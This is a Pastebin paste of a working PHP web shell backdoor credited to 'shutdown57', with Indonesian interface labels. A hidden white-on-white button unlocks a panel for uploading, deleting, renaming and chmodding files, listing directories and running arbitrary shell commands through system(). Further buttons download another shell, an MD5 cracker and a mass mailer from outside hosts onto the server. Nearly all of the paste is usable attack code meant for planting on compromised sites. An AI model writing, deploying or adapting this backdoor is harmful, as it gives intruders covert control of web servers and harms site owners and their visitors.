Advertisement
Not a member of Pastebin yet?
Sign Up,
it unlocks many cool features!
- <?php
- //Script Kiddies EveryWhere :V
- #######################
- # Shell Backdoor #
- # Mini simple shell #
- # Author : shutdown57 #
- #######################
- //Semoga kau bukan script kiddies :'V
- echo'
- <style>
- #cok{
- color:#fff;
- background:#fff;
- display:none;
- }
- </style>
- <div id="cok">
- <form method="request" >
- <input type="submit" value="_" name="root" >
- </form>
- </div>';
- if($_REQUEST['root']){
- #shutdown57--Priv8--backdoor
- @error_reporting(0);
- @set_time_limit(0);
- $judul = "root@shutdown57:~#";
- $user = $_REQUEST['root'];
- $tanggal = date('d > m > Y');
- $fn = $_SERVER['REQUEST_URI'];
- $doc_root = $_SERVER['DOCUMENT_ROOT'];
- $os = $_SERVER['HTTP_USER_AGENT'];
- $host = $_SERVER['HTTP_HOST'];
- echo'
- <!DOCTYPE HTML>
- <html lang="en">
- <head>
- <meta name="viewport" content="width=width-device,initial-scale=1" >
- <meta name="keywords" content="shutdown57,alin57,57,[!]$hutdown57[!],shell,backdoor">
- <meta name="Author" content="shutdown57,alin57">
- <title> '.$judul.' </title>
- </head>
- <body>
- <pre><font color="#eee">
- ~# shutdown57 Priv8 Shell #~
- ================================
- | c0ded By : shutdown57 |
- ================================
- </pre></font>
- <div align="center">
- <form method="post">
- <input type="submit" name="info" value="info" id="tombol">
- <input type="submit" name="upload" value="upload" id="tombol">
- <input type="submit" name="buatf" value="buat file" id="tombol">
- <input type="submit" name="hapusf" value="hapus file" id="tombol">
- <input type="submit" name="buatd" value="buat folder" id="tombol">
- <input type="submit" name="hapusd" value="hapus folder" id="tombol">
- <input type="submit" name="lihatf" value="lihat file" id="tombol">
- <input type="submit" name="ambil" value="import shell" id="tombol">
- <input type="submit" name="ambil_md5" value="MD5 cracker" id="tombol">
- <input type="submit" name="ambil_mailer" value="Mailer" id="tombol">
- <input type="submit" name="rename" value="Ganti Nama" id="tombol">
- <input type="submit" name="chmod" value="chmod" id="tombol">
- <input type="submit" name="command" value="terminal" id="tombol">
- <input type="submit" name="logout" value="keluar" id="tombol">
- </form>
- </div>
- <center>';
- if($_POST['upload']){
- echo' <form action="" method="post" enctype="multipart/form-data">
- <input type="file" name="shutdown57" id="text">
- <br>
- <input type="text" value="'.getcwd().'" name="fold" id="text">
- <br>
- <button type="submit" name="btn-upload" id="submit">Upload !</button>
- </form>';}
- if(isset($_POST['btn-upload']))
- {
- $pic = $_FILES['shutdown57']['name'];
- $pic_loc = $_FILES['shutdown57']['tmp_name'];
- $akm = $_POST['fold'];
- $folder = "$akm/"; if(move_uploaded_file($pic_loc,$folder.$pic))
- {
- ?><script>alert('Berhasil Upload !');</script><?php
- }
- else
- {
- ?><script>alert('Gagal Upload\-,-/');</script><?php
- }
- }
- if($_POST['buatf']){
- echo'
- <form method="post">
- <textarea name="text">
- <!DOCTYPE HTML>
- <html lang="en">
- </textarea>
- <input type="text" value="'.getcwd().'/s57.html" name="nama_file" id="text">
- <input type="submit" value="simpan!" id="submit" name="save">';
- }elseif($_POST['save']){
- $text = $_POST['text'];
- $file = $_POST['nama_file'];
- $hendel = fopen(''.$file.'','a+');
- fwrite($hendel,"$text");
- fclose($hendel);
- echo' berhasil membuat file '.$file.'';
- }
- if($_POST['hapusf']){
- echo'
- <form method="post">
- <input type="text" value="file.php" name="hf" id="text" >
- <br>
- <input type="submit" value="Hapus" id="submit" name="goo">
- </form>';}elseif($_POST['goo']){
- $file_hapus = $_POST['hf'];
- unlink($file_hapus);
- echo'Berhasil Menghapus '.$file_hapus.'';
- }
- if($_POST['buatd']){
- echo'<form method="post">
- <input type="text" value="folder" name="bd"id="text">
- <br>
- <input type="submit" value="buat" id="submit" name="buat_folder">
- </form>';}elseif($_POST['buat_folder']){
- $buat_dir = $_POST['bd'];
- mkdir($buat_dir);
- echo'berhasil buat folder '.$buat_dir.'';}
- if($_POST['hapusd']){
- echo' <form method="post">
- <input type="text" value="folder" name="hd" id="text">
- <br>
- <input type="submit" value="Hapus" id="submit" name="hapus_folder">
- </form>';}elseif($_POST['hapus_folder']){
- $hd = $_POST['hd'];
- rmdir($hd);
- echo' berhasil menghapus '.$hd.'';}
- if($_POST['lihatf']){
- echo'<form method="post">
- <input type="text" value="'.$doc_root.'" name="scandir" id="text">
- <input type="submit" name="durn" value="Go!" id="submit"></form>';}elseif($_POST['durn']){
- $tar = $_POST['scandir'];
- $candir = scandir($tar);
- echo'<pre id="lf">';
- echo'====shutdown57====';
- print_r($candir);
- echo'</pre>';}
- if($_POST['command']){
- echo' <form method="post">
- <input type="text" value="uname" name="prnth" id="text">
- <br>
- <input type="submit" id="submit" value="Run !" name="run">
- </form>';}elseif($_POST['run']){
- $comm = $_POST['prnth'];
- $runn = system($comm);
- echo'<pre>';
- print_r($runn);
- echo'</pre>';}
- if($_POST['chmod']){
- echo' <form method="post">
- <input type="text" value="file.php" name="chm" id="text">
- <input type="text" value="755" name="mode" id="text">
- <br>
- <input type="submit" value="Chmod!" id="submit" name="cm">
- </form>';}elseif($_POST['cm']){
- $comh = $_POST['chm'];
- $mode = $_POST['mode'];
- chmod($comh,$mode);
- echo'Berhasil chmod '.$comh.'#'.$mode.'';}
- if($_POST['info']){
- echo' <pre id="lf">
- ++++++root@'.$user.':~#++++++++
- ================================
- ++ User :'.$user.'
- ++ Date : '.$tanggal.'
- ++ root : '.getcwd().'
- ++ file : '.$fn.'
- ++ Host : '.$host.'
- </pre>
- ++ Browser : '.$os.'
- ';}
- if($_POST['logout']){
- header('location:?keluar='.$user.'');
- }
- if($_POST['rename']){
- echo'<form method="post">
- <input type="text" value="file.php" name="on" id="text">
- <input type="text" value="file_baru.php" name="nn" id="text">
- <br>
- <input type="submit" value="Rename!" id="submit" name="WwW">
- </form>';
- }elseif($_POST['WwW']){
- $old = $_POST['on'];
- $new = $_POST['nn'];
- rename($old,$new);
- echo' '.$old.' berhasil di ganti '.$new.'';
- }
- if($_POST['ambil']){
- define('BUFSIZ', 4095);
- $url = 'http://kartinisoft.com/wp-content/uploads/2014/02/wos.php';
- $rfile = fopen($url, 'r');
- $lfile = fopen(basename($url), 'w');
- while(!feof($rfile))
- fwrite($lfile, fread($rfile, BUFSIZ), BUFSIZ);
- fclose($rfile);
- fclose($lfile);
- echo'wos.php telah di tambahkan ';}
- if($_POST['ambil_md5']){
- define('BUFSIZ', 4095);
- $url = 'http://alinko.pe.hu/upload/md5.php';
- $rfile = fopen($url, 'r');
- $lfile = fopen(basename($url), 'w');
- while(!feof($rfile))
- fwrite($lfile, fread($rfile, BUFSIZ), BUFSIZ);
- fclose($rfile);
- fclose($lfile);
- echo'md5.php telah di tambahkan ';}
- if($_POST['ambil_mailer']){
- define('BUFSIZ', 4095);
- $url = 'http://alinko.pe.hu/upload/mailer.php';
- $rfile = fopen($url, 'r');
- $lfile = fopen(basename($url), 'w');
- while(!feof($rfile))
- fwrite($lfile, fread($rfile, BUFSIZ), BUFSIZ);
- fclose($rfile);
- fclose($lfile);
- echo'mailer.php telah di tambahkan ';}
- echo'
- <style>
- /**
- #Stylesheet
- #Coded By shutdown57
- #Kiddies Everywhere :V
- **/
- body{
- background:#000;
- color:#81ff00;
- }
- #tombol{
- color:#81ff00;
- background:#005d33;
- border-radius:5px;
- border:0;
- margin:2px;
- box-shadow:0px 0px 4px #eee;
- transform:rotate(5deg);
- -o-transform:rotate(5deg);
- -webkit-transform:rotate(5deg);
- -moz-transform:rotate(5deg);
- }
- #tombol:hover{
- background:#81ff00;
- color:#005d33;
- transform:rotate(-5deg);
- -o-transform:rotate(-5deg);
- -webkit-transform:rotate(-5deg);
- -moz-transform:rotate(-5deg);
- }
- #submit{
- color:#81ff00;
- background:#005d33;
- border-radius:5px;
- border:0;
- box-shadow:0px 0px 4px #eee;
- }
- #submit:hover{ background:#81ff00;
- color:#005d33;}
- #text{
- color:#000;
- background:#81ff00;
- width:70%;
- border:0;
- }
- #bla{
- background:#000;}
- textarea{
- width:70%;
- height:200px;
- color:#81ff00;
- background:#000;
- border:0;}
- #lf{
- text-align:left;
- }
- </style>';
- }
- ?>
Advertisement
Add Comment
Please, Sign In to add comment
Advertisement